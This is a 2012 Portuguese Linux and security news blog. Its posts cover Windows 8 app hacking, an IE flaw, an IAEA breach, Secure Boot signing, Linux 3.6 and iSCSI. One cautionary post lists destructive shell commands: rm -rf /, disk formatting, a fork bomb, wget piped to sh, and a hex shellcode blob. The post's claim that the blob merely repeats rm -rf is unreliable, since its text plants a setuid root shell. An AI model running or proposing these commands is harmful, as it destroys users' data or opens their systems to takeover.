sábado, 15 de dezembro de 2012

Aplicativos para Windows 8 são fáceis de hackear

O Windows 8 oferece vários vetores que permitem a manipulação ou modificação de aplicativos, de acordo com Justin Angel. Em sua página pessoal (agora offline edisponível apenas em cache), ele descreve a facilidade de hackear esses aplicativos já que, segundo ele, os dados criptografados são armazenados localmente - juntamente com o algoritmo de criptografia e a chave de hash.

Angel usa diferentes aplicativos de jogo para demonstrar o que é possível fazer com esse conhecimento em mente. Usando 1dados armazenados localmente e ferramentas como dotPeek, o engenheiro afirma que é possível criar um “estoque de ouro” que, de outra forma, precisaria comprar com dinheiro real em um jogo. Angel simplesmente define o preço de compra dos itens para “0” em outro jogo e converte aplicativos de teste gratuito para versões completas que ele então acessa gratuitamente. Seus estudos se concentram em aplicativos que usam o Microsoft Intermediate Language (IL).

Angel também apresenta um hack para aplicativos, como o “Cut the Rope”, que aguarda uma resposta do servidor. O hacker aproveita o fato do Windows Internet Explorer 10 lhe permitir injetar código JavaScript; ele então usa essa brecha para enganar o software, fazendo se passar por seu criador, o que lhe permite aceder gratuitamente a níveis que, de outra forma, precisariam ser pagos.

O engenheiro disse que escolheu jogos para demonstrar as vulnerabilidades do sistema porque “os jogos representam a maior parte da receita dos desenvolvedores”. Embora os dados relativos ao desktop Windows 8 e sistemas operacionais para tablets ainda não tenham sido liberados, as estatísticas oficiais da Microsoft revelam, por exemplo, que 64% da receita de aplicativos para o sistema operacional do Windows Phone 7 é gerada a partir de downloads de jogos comerciais.
Angel também examina como esses problemas podem ser corrigidos. Por exemplo, ele observa que a disponibilidade de armazenamento criptografado do aplicativo que só pode ser acessada ​​por desenvolvedores poderia ajudar. Versões completas e de teste poderiam ser claramente separadas com a liberação destas últimas na forma de pacotes com recursos gerais limitados - e sem a opção para desbloquear a versão completa.

O engenheiro afirma que sua motivação não foi a de fornecer instruções para hacker apps. Pelo contrário, Angel destaca que ele próprio comprou os aplicativos que invadiu e recomenda que seus leitores façam o mesmo, porque “são incríveis”. Ele também observa que o seu empregador não tem nada a ver com seu artigo e que ele trabalhou com os hacks em seu tempo livre. Isto poderia soar um tanto controverso, já que, de acordo com informações acessíveis publicamente como em seu perfil no Twitter, Justin Angel é um engenheiro da Nokia que trabalha no desenvolvimento dos sistemas operacionais do Windows Phone 7 e 8. (Lembrando que a Microsoft e a Nokia trabalharam juntas para desenvolver o Windows Phone).
fonte: Linux magazine 

quinta-feira, 13 de dezembro de 2012

Falha no Internet Explorer deixa usuários vulneráveis

Conforme a empresa britânica Spider.io, uma falha no Internet Explorer  6 a 10 faz com que crackers possam gravar todos os movimentos do mouse. Assim, senhas e PINs podem ser capturados pelos cibercriminosos caso sejam digitadas em um teclado virtual.
De acordo com a empresa, sem citar nomes,  tal falha vem sendo explorada por duas redes de publicidade. "Enquanto a página com o anúncio contaminado estiver aberta - mesmo se você a coloca em segundo plano ou minimiza o Internet Explorer - o cursor do mouse pode ser rastreado por toda a sua tela inteira", diz comunicado da Spider.io.
A Spider.io disse também que a Microsoft Security Research Center já reconheceu o problema, porém, ainda não mencionou em corrigir a falha.
A empresa publicou os detalhes da falha do IE e também um jogo para demonstrar como pode ser usada para vigiar as atividades dos usuários.

sexta-feira, 30 de novembro de 2012

Hackers invadem agência de energia atômica da ONU

Um grupo de hackers invadiu os sistemas de computação da Agência Internacional de Energia Atômica (International Atomic Energy Agency - AIEA), copiou informações pessoais de contato de cientistas e as publicou no Pastebin. Em Viena, na terça-feira, um porta-voz da AIEA disse que os dados incluíam endereços de email de 150 cientistas internacionais que trabalham com a AIEA. Os dados aparentemente vieram de um servidor, desativado há algum tempo, por conta de preocupações sobre vulnerabilidades presentes no sistema. Um grupo autodenominado “Parastoo” reivindicou a responsabilidade pelo ataque quando publicou os dados no Pastebin no último domingo.

Em sua “primeira mensagem pública”, o grupo pediu aos cientistas que apoiassem uma investigação independente sobre o reator nuclear de Israel em Dimona. Sobre o reator há muito pesa a suspeita de produção de armas nucleares. O grupo questiona o papel da AIEA a respeito de Israel e de outros programas nucleares internacionais, cinicamente observando que a missão da AIEA para desempenhar seus “justos deveres humanitários internacionais” certamente poderiam envolver “stuxnetizar material nuclear”. A menção faz referência ao worm Stuxnet, que infectou computadores industriais, por exemplo, no site da divisão nuclear iraniana Bushehr.


O grupo também incluiu uma ameaça no pedido feito aos cientistas, prometendo que, se os ataques contra cientistas nucleares iranianos continuarem, informações ainda mais sensíveis das operações da AIEA serão publicadas na Internet. Os hackers disseram que não segurariam os dados “se um elemento ocidental favorecido diverte-se de moto atirando coquetel de bomba magnética em seus alvos”. Ao longo dos últimos anos, vários cientistas iranianos morreram em atentados terroristas. O governo de Teerã considera Israel e Estados Unidos responsáveis ??pelos ataques.

Gill Tudor, da AIEA, revelou que os dados foram “roubados de um servidor antigo que foi desativado há algum tempo” e pediu desculpas pelo vazamento de dados, acrescentando que o incidente está sendo investigado pelos especialistas em TI da Agência. De acordo com a agência de notícias dpa, outras fontes em Viena citaram que o ataque de hackers não parece ter sido realizado em nome de um governo: “foi feito de forma muito grosseira para isso”.

Fonte:linux magazine

quarta-feira, 21 de novembro de 2012

Linux Foundation luta por assinatura do Microsoft Secure Boot

Apesar de várias tentativas, James Bottomley, da Linux Foundation, não conseguiu fazer com que a Microsoft assinasse o mini bootloader de inicialização do Linux em sistemas com UEFI Secure Boot. Em um post em seu blog, o membro do Linux Foundation Technical Advisory Board (TAB) afirma que conseguiu com sucesso usar um sistema Linux para várias tarefas preparatórias de assinatura do bootloader, embora a Microsoft estipule que uma plataforma Windows específica deva ser utilizada para isso. No entanto, Bottomley disse que para fazer o upload do arquivo CAB contendo o bootloader, precisou usar uma máquina virtual com Windows 7, já que esta etapa requer Silverlight, sendo que a implementação Moonlight do Silverlight - de código aberto - simplesmente não funcionou.

James escreveu que, depois de ser carregado, o arquivo deveria concluir um processo de 7 etapas. Entretanto, o desenvolvedor relata que o processo parou na fase 6, e que questionou sobre as razões do problema seis dias depois. Aparentemente, a equipe de suporte da Microsoft respondeu que o arquivo não é um aplicativo Win32 válido, ao que Bottomley respondeu observando que, obviamente, não é um aplicativo Win32, pois é um binário UEFI de 64 bits - depois disso, não obteve mais nenhuma resposta. Ele relata que então começou um novo processo de assinatura, conseguindo chegar mais longe desta vez e finalmente recebendo um email com um bootloader assinado - porém no email uma nova surpresa: a mensagem dizia que o processo de assinatura havia falhado. Quando perguntada sobre isso, a equipe de suporte da Microsoft teria dito a Bottomley que ele não deve usar o arquivo entregue pois fora incorretamente assinado.
O desenvolvedor concluiu afirmando que “ainda espera que a Microsoft forneça à Linux Foundation um pre-bootloader com assinatura válida”, acrescentando que, “quando isto acontecer, o mesmo será enviado para o site da Linux Foundation para que todos possam utilizá-lo”.

Algumas semanas atrás, na conferência LinuxCon Europa 2012, Bottomley explicou em sua apresentação (slides aqui) por que nem o Consórcio UEFI nem a Linux Foundation, fabricantes do hardware ou de qualquer uma das distribuições Linux, haviam criado seu próprio certificado para assinar o bootloader, da mesma forma como a Microsoft faz com a VeriSign: aparentemente, a conta é simplesmente alta demais. De acordo com Bottomley, a Linux Foundation havia negociado com a VeriSign para criar um serviço de assinatura conjunta - ao que a VeriSign teria cobrado vários milhões de dólares para realizar o serviço. O desenvolvedor acrescentou ainda que a Linux Foundation também havia considerado iniciar sua própria autoridade de certificação, mas abandonou o plano por exigir um enorme esforço e custos muito elevados.

fonte: linux magazine

terça-feira, 20 de novembro de 2012

Especialistas em seguranca afirmam que roubar senhas do windows 8 é bem mais fácil.

Especialistas ja comecaram a encontrar falhas de seguranca do Windows 8. Eles descobriram que roubar as senhas do software é extremamente fácil.
O pessoal do Ars technica explicou onde esta a vulnerabilidade do sistema. De acordo com especialistas em seranca, que testaram os recursos do desenvolvedor
ainda no pré-lancamento do Windows 8, a criptografia que o sistema esta utilizando para armazenar senhas pode ser revertido.
Por meio de um procedimento simples hackers conseguem converter as senhas do usuarios em um arquivo de texto.Porém, os especialistas também afirmam que descobrir as senhas do sistema nao é o pior dos problemas, desde que voce nao possua nenhuma informacao importante desprotegida em sua máquina.
O pesquisador de seguranca, Adam Caudill, alerta para um fato muito importante : o descuido das pessoas com criacao de senhas ."O maior risco que eu vejo é a  probablidade de reutilizacao da senha, porque as pessoas sao muito ruins para escolher boas senhas, e elas tendem a reutiliza-las varias vezes", disse Adam.
Em resposta a isso, um porta-voz da Microsoft disse ao Softpedia que o Windows 8 é um ambiente muito seguro de trabalho e que nao armazena nenhuma senha em arquivos de texto.
"A Microsoft trata a privacidade e os dados de seus usuários como uma prioridade.Fazemos muitas coisas aqui, e como parte disso, é claro que nao armazenamos senhas em arquivos de texto simples. Além disso, fazemos grandes investimentos na prevencao contra hackers que possam acessar os seus dados", completou o porta-voz.

quarta-feira, 3 de outubro de 2012

Confira todas as novidades do novo kernel Linux 3.6


Tux

Confira todas as novidades do novo kernel Linux 3.6



Linus Torvalds publicou hoje a versão 3.6 do kernel Linux, após dez semanas de desenvolvimento. A nova versão, batizadade Terrified Chipmunk, oferece uma série de novos recursos para usuários finais, profissionais do sistema e administradores.

Gerenciamento de energia

novo recurso de Suspend to Both dará ao Linux 3.6 capacidade de entrar em modo standby híbrido. O Mac OS X e o Windows já oferecem esse recurso há algum tempo; ele envolve fazer com que o computador armazene o conteúdo de sua memória tanto na RAM como no disco do sistema durante a hibernação. Um sistema que hiberna dessa maneira deve acordar em questão de poucos segundos, como se estivesse acordando de um Suspend-to-RAM (ACPI S3); contudo, se a energia for terminada durante essa hibernação, por exemplo caso a bateria acabe, o sistema vai restaurar o conteúdo da memória a partir do disco como faria após um Suspend-to-Disc (Hibernate). Em um breve teste realizado em um sistema relativamente antigo, com um disco de 250GB, o Suspend-to-Both levou em torno de 16 segundos para suspender atividades -- quatro vezes mais demorado do que com o Suspend-to-RAM e o mesmo tempo necessário para um Suspend-to-Disk.
Essa versão do kernel Linux também podem colocar os dispositivos PCIe no estado de suspensão profunda "D3cold"; essa tecnologia é atualmente suportada por alguns computadores modernos e pode desligar completamente dispositivos PCIe individuais.

Sistemas de arquivos

O sistema de arquivo Btrfs, ainda em estágio experimental, agora suporta cotas para subvolumes (áreas separadas dentro de um sistema de arquivos), definindo quanto espaço elespodem ocupar. Outro novo recurso no Btrfs é o "enviar/receber" (send/receive). Isso permite que programas no userspace determinem a diferença entre dois instantâneos, salvar essas diferenças em um arquivo e restaurar esses backups quando necessário. Isso é particularmente útil para backups incrementais e atomizados. Uma explicação mais detalhada dessa função, que também está disponível no ZFS, podem ser encontradas em um artigo na LWN.net.
Uma das novas funções implementaradas no Linux 3.6 é baseada em uma ideia que data de 1996 -- o kernel pode ser agora configurado para não seguir hardlinks e softlinks em diretórios com um bit de configuração "sticky" (como o /tmp/), quando esses links apontam para algum ponto superior na árvore de diretórios. Conforme a LWN.net explica neste artigo, esse recurso, que pode ser ativado através do sysctl, põe um fim a um truque comum usado por invasores para escalar seus privilégios ao usar serviços operando em background como root.

Armazenamento

Uma nova interface permite que programas no espaço de usuário notifiquem o kernel quando o tamanho de uma partição que estejam usando muda, permitindo que o kernel seja informado de mudanças no tamanho de partições montadas ou outras durante a execução e agindo de acordo. O programa resizepart, que usará essa nova interface, foi incluído na recém-lançadaversão prévia do util-linux 2.22-rc2.
Mudanças no código do software RAID no subsistema MD deve melhorar o desempenho de conjuntos RAID em que um ou todos os dispositivos de armazenamento sejam SSDs. Os desenvolvedores do kernel agregaram o driver tcm_vhost, que está classificado como staging, mas não está vivendo no ramo de desenvolvimento staging do kernel. Ele permite que dispositivos SCSI em um sistema host para ser usado com um overhead mínimo por sistemas convidados usando KVM.

Virtualização

O KVM agora inclui diversas modificações que reduzem a carga de trabalho para manipulação de interrupções e portanto melhorando seu desempenho. Outro acréscimo ao kernel é o IOMMU Groups, que aprimora o isolamento de dispositivos PCI e PCIe usando tecnologias de virtualização de entrada e saída (I/O) como o AMD-Vi e VT-d da Intel. O recurso IOMMU Groups também é a base para o framework do driver de userspace VFIO (Virtual Function I/O); pensado principalmente para o KVM, esse recurso é usado para transpor dispositivos PCI e PCIe para máquinas convidadas, permitindo que acessem esses dispositivos com baixa latência e altos níveis de transmissão de dados, sem qualquer risco para o hospedeiro. Detalhes sobre o VFIO estão disponíveis na documentação e em um artigo da LWN.net. Extensões para oferecer VFIO através do QEMU ainda estão em desenvolvimento.

Redes

O recurso TCP Small Queues (TSQ) faz com que o Linux 3.6 use de pequenos buffers de até 128KB por saída de rede como padrão. Como diversas outras mudanças recentes no kernel, essa medida foi tomada para evitar o bufferbloat -- um termo usado para problemas como grandes latências de rede e conexões interrompidas causadas por excesso de buffering durante transferências de dados. De acordo com resultados de teste fornecidos pelos desenvolvedores responsáveis, os buffers menores por conexão não afetam a transmissão de dados; se necessário, administradores podem usar o arquivo/proc/sys/net/ipv4/tcp_limit_output_bytes para ajustar o valor do buffer durante a execução do sistema.
O kernel agora inclui suporte para cliente do TCP Fast Open (TFO), o suporte para servidores deve seguir com o Linux 3.7. O TFO é uma extensão experimental TCP que ainda não foi aprovada pela Internet Assigned Numbers Authority (IANA). Ela foi desenvolvida para reduzir o overhead quando estabelecendo uma conexão, que deve acelerar consideravelmente conexões HTTP.

Drivers

Desenvolvedores do Linux agregaram uma série de acréscimos e correções no Linux 3.6 destinadas a melhorar o suporte aos laptops Apple MacBook que foram lançados em juhlo (como o MacBook Pro Retina). Porém, nem todo o necessário para os novos MacBooks foi acrescentado ao novo kernel. Além disso, em alguns modelos, essa versão ainda exibe problemas durante a inicialização ou no uso do hardware gráfico.
O driver gráfico Radeon agora ativa os modos mais rápidos de transferência do PCIe 2.0, quando eles são suportados pelo hardware. Os drivers de áudio agora suportam oprocessadores Haswell da Intel e as plataformas de hubs controladores (platform controller hubs, ou PCHs) Lynx Point, que a Intel planeja lançar no próximo ano. Um driver para o teclado com trackpoint USB do ThinkPad, da Lenovo, foi integrado ao subsistema input. O driver bnx2x, que lida com diversos chips Ethernet da Broadcom, agora suporta o padrão Energy-Efficient Ethernet (EEE) que é especificado no documento IEEE 802.3az. Usuários podem elr ou definir parâmetros EEE através do recém-lançado ethtool 3.5.

Sumário

O kernel tem avançado consideravelmente em todos os campos de tecnologia. O Btrfs já deu um grande passo à frente, e o suporte à suspensão híbrida é um recursos há muito aguardado. Além disso, vimos uma alteração que encerrou um popular vetor de ataque à segurança do Linux.
No total o kernel já soma 15.868.036 linhas de código, num total de 39.733 arquivos. Seu código-fonte pode ser baixado diretamente do site kernel.org e em breve estará disponível eminúmeros servidores que espelham o site. A autenticidade do arquivo baixado pode ser verificado com um arquivo de assinatura que também está disponível.


domingo, 16 de setembro de 2012

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

 
Os 7 comandos mais perigosos do mundo Linux [CUIDADO]
É muito normal lermos diversos tutoriais em busca de uma informação e sair digitando todos os comandos que quem o escreveu mandou. É camarada, muita calma nessa hora.
Infelizmente, existem muitos malintencionados por aí que, dentro de um tutorial sério ou no comentário do mesmo, postam certos comandos para que usuários inexperientes se deem mal. Tome muito cuidado com os sites que você visita em busca de informação.
Esta lista abaixo representa os 7 comandos mais perigosos do mundo Linux. São comandos que você NUNCA DEVE EXECUTAR!
Lembre-se: o terminal é uma ferramenta poderosíssima, porém é preciso muito conhecimento para saber usá-lo.
Primeiro comando:
rm-rf /    (com privilégios de root usando o “sudo” ou logado como root)
Este comando irá apagar todo o seu sistema!

Segundo comando:
É o mesmo do comando acima, porém escrito em código hexadecimal.
  • char esp[] __attribute__ ((section(“.text”))) /* e.s.p
  • release */
  • = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
  • “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
  • “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
  • “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
  • “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
  • “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
  • “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
  • “cp -p /bin/sh /tmp/.beyond; chmod 4755
  • /tmp/.beyond;”;

Terceiro comando:
mkfs.ext3 /dev/sda
Este comando irá formatar o seu dispositivo /dev/sda e, claro, irá apagar todos os arquivos contidos nele.

Quarto comando:
|:(){:|:&};:
Conhecido como “Fork Bomb”, ele irá executar inúmeros processos em seu sistema, fazendo com que o seu computador trave na hora!

Quinto comando:
qualquer_comando > /dev/sda
Ele irá escrever a saída do comando executado (qualquer) em /dev/sda, apagando todo o conteúdo preexistente .

sexto comando::
wget http://uma_url_qualquer -O- | sh
O comando wget realiza downloads. Porém, existe no fim da linha um “|”, que funciona como redirecionador. Ou seja, ao término do download, ele executará o arquivo baixado. Se o arquivo não for um shell script, ok. Porém se for, ele executará automaticamente na sua máquina, o que é um prato cheio pra fazer um usuário desavisado se dar mal.

setimo comando:
mv /home/username/* /dev/null
Irá mover diretório home para um lugar que realmente não existe. Em outras palavras, ele irá apagar seu diretório home.

Os comandos listados acima são prejudiciais se executados da forma que exemplificamos. Um exemplo: o sétimo comando prejudicial começa com o comando “mv”, que é responsável por mover arquivos entre diretórios. Ele sozinho não é prejudicial, pelo contrário, é essencial. O problema é usá-lo para “mover a sua home para /dev/null”, que é conhecido como o “buraco negro do Linux”
fonte Blog seja livre

domingo, 2 de setembro de 2012

Como evitar que os usuários alterem suas senhas no linux


Uma das características de segurança mais importantes usados ​​hoje são senhas. Nesta seção, eu vou compartilhar uma dica simples sobre a forma de impedir que seus usuários alterem suas senhas.

Normalmente / usr / bin / passwd tem a seguinte permissão SUID:

# Ls-l / usr / bin / passwd

-rs-x-x 1 root root 17890 9 de maio de 2012 / usr / bin / passwd


Aqui, o valor numérico da permissão de arquivo será 4411.

Quando um arquivo SUID é executado, o processo que corre é concedido o acesso aos recursos do sistema com base no usuário que é dono do arquivo e não o usuário que criou o processo.

Então, agora temos que remover o SUID para o comando, para que os usuários normais não tenha privilégios de atualizar o arquivo:

# Chmod u-s / usr / bin / passwd

ou

# Chmod 511 / usr / bin / passwd

É isso, agora os usuários não podem alterar suas senhas padrão .

traduzido de linux server world.

sábado, 25 de agosto de 2012

ISCSI gerenciamento de armazenamento - Um protocolo de armazenamento de Area Network

O protocolo iSCSI é uma rede  de armazenamento (SAN)  de protocolo que permite iniciadores iSCSI usar dispositivos de armazenamento no destino iSCSI (remoto) utilizando cabos ethernet normal. Para o iniciador iSCSI, o armazenamento remoto parece um disco rígido conectado localmente.

O que é iSCSI?
É um protocolo de rede de armazenamento acima de TCP / IP. Este protocolo encapsula SCSI de dados em pacotes TCP. iSCSI nos permite conectar um host para uma matriz de armazenamento através de uma conexão Ethernet simples (unidade de fita). Esta solução é mais barata do que a Fibre Channel SAN (Fibre Channel HBAs e switches são caros). Do ponto de vista anfitrião o usuário vê a matriz de armazenamento.
 

LUN
LUNs como um disco local. dispositivos iSCSI não deve ser confundida com dispositivos NAS (por exemplo NFS). A diferença mais importante é que os volumes NFS pode ser acessado por vários hosts, mas um volume iSCSI pode ser acessado por um host. É semelhante ao SCSIi protocolo: geralmente apenas um host tem acesso a um disco SCSI (a diferença é o ambiente de cluster). O protocolo iSCSI é definido no documento RFC3720 pelo IETF (Internet Engineering Task Force).

Alguns críticos disseram que a iSCSI tem um pior desempenho em comparação com Fibre Channel e causa alta carga de CPU nas máquinas hospedeiras. Eu acho que se nós usamos Gigabit Ethernet, a velocidade pode ser suficiente. Para superar a alta carga de CPU, alguns fornecedores desenvolveram o iSCSI TOE-s (TCP Offload Engine). Isso significa que o cartão foi construído em um chip de rede, que cria e calcula a quadros tcp. O kernel do Linux não suporta diretamente este e os fornecedores de cartão de escrever seus próprios drivers para o sistema operacional.

iniciador
O iniciador é o nome do cliente iSCSI. O cliente iSCSI tem um acesso de nível de bloco para o alvo iSCSI. Um cliente pode usar múltiplos alvos iSCSI.

alvo
O alvo é o nome do servidor iSCSI.

descoberta
Descoberta é o processo que mostra as metas para o iniciador.


traduzido de Linux server world

domingo, 22 de julho de 2012

Mozilla disponibiliza suas primeiras compilações do Firefox OS

Compilações noturnas do sistema operacional em código aberto Firefox OS da Mozilla, destinado a dispositivos móveis, já estão disponíveis para download no servidor FTP do projeto. Essas primeiras compilações, nomeadas como b2g-17.0a1, são destinadas a desenvolvedores e podem ser executadas em sistemas desktop para testes. Com compilações prontas para Windows, Mac OS X e Linux (com código-fonte também fornecido), os desenvolvedores podem experimentar o sistema, criar e testar aplicativos; a equipe de engenharia para lançamentos da Mozilla espera que usuários vão também relatar quaisquer falhas que encontrarem.
A plataforma Firefox OS -- divulgada pela primeira vez em 2011 como Boot to Gecko (B2G) -- é a proposta de sistema operacional para dispositivos móveis da organização sem fins lucrativos. Completamente centrado no navegador web, a arquitetura do sistema, que opera sobre um kernel Linux, foi desenvolvida para eliminar a necessidade de aplicativos serem desenvolvidos usando APIs específicas das plataformas. Ao invés disso, os desenvolvedores podem criar novos aplicativos usando padrões abertos, como o HTML5.
Os recursos do telefone são implementados como aplicativos web armazenados localmente, removendo toda necessidade de código nativo e camadas de middleware do dispositivos. Quaisquer APIs necessárias para explorar todos os recursos do telefone, como câmera, Bluetooth, USB e NFC, são implementadas como APIs Web e submetidas à W3C "para padronização".
Uma série de fabricantes de dispositivos, incluindo a TCL Communication Technology e a ZTE, já se comprometeram a construir aparelhos baseados no processador Snapdragon da Qualcomm usando o sistema operacional da Mozilla; os primeiros aparelhos com o Firefox OS devem chegar ao mercado brasileiro no começo de 2013.
Mais detalhes sobre essas compilações diárias podem ser encontradas em uma entrada no blog pessoal de Tony Chung, da Mozilla; instruções para compilar a executar o b2g são fornecidas na página Gaia/Hacking da MozillaWiki.